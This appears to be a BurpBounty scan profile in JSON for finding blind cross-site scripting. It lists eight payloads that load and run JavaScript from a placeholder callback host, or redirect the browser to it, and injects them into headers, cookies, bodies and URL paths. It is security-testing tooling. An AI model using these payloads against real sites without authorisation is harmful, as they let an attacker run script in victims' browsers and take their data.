[
  {
    "profile_name": "Blind_XSS",
    "enabled": true,
    "scanner": "active",
    "author": "@bountysecurity",
    "steps": [
      {
        "request_type": "original",
        "reuse_cookie": false,
        "insertion_point": "same",
        "raw_request": "",
        "payloads": [
          "true,\u003cscript\u003e$.getScript(\"//{BH}\")\u003c/script\u003e",
          "true,\u003cscript\u003efunction b(){eval(this.responseText)};a\u003dnew XMLHttpRequest();a.addEventListener(\"load\",b);a.open(\"GET\",\"//{BH}\");a.send();\u003c/script\u003e",
          "true,\"\u003e\u003cscript src\u003dhttp://{BH}\u003e\u003c/script\u003e",
          "true,javascript:eval(\u0027var a\u003ddocument.createElement(\\\u0027script\\\u0027);a.src\u003d\\\u0027http://{BH}\\\u0027;document.body.appendChild(a)\u0027)",
          "true,\u003cscript src\u003dhttp://{BH}\u003e\u003c/script\u003e",
          "true,\u003csvg/oNLoAd\u003d(document.location\u003d\u0027http://{BH}\u0027)\u003e",
          "true,\"\u003e\u003csvg/oNLoAd\u003d(document.location\u003d\u0027http://{BH}\u0027)\u003e",
          "true,\u003cimg src\u003dx onerror\u003dthis.src\u003d\"http://{BH}\"\u003e"
        ],
        "payloads_file": "",
        "payload_position": "replace",
        "change_http_request": false,
        "change_http_request_type": "post_to_get",
        "insertion_points": [
          "extension_provice",
          "user_agent",
          "entire_body",
          "param_body",
          "param_cookie",
          "param_json",
          "url_path_folder",
          "param_multipart_attr",
          "user_provided",
          "param_url",
          "param_xml",
          "param_xml_attr",
          "url_path_filename",
          "referer",
          "origin",
          "entire_body_xml",
          "entire_body_json",
          "entire_body_multipart"
        ],
        "header_value": false,
        "new_headers": [],
        "match_replace": [],
        "encoder": [],
        "url_encode": false,
        "chars_to_url_encode": "",
        "greps_file": "",
        "grep": [
          "true,,Blind Host,,"
        ],
        "redir_type": "always",
        "max_redir": 5,
        "show_alert": "always",
        "issue_name": "Blind_XSS",
        "issue_severity": "High",
        "issue_confidence": "Certain",
        "issue_detail": "\u003cbr/\u003e\u003cbr/\u003e- PAYLOAD: \u003cbr/\u003e\u003cpayload\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n- GREP: \u003cbr/\u003e\u003cgrep\u003e",
        "remediation_detail": "",
        "issue_background": "",
        "remediation_background": ""
      }
    ],
    "Tags": [
      "Blind XSS",
      "XSS",
      "All"
    ]
  }
]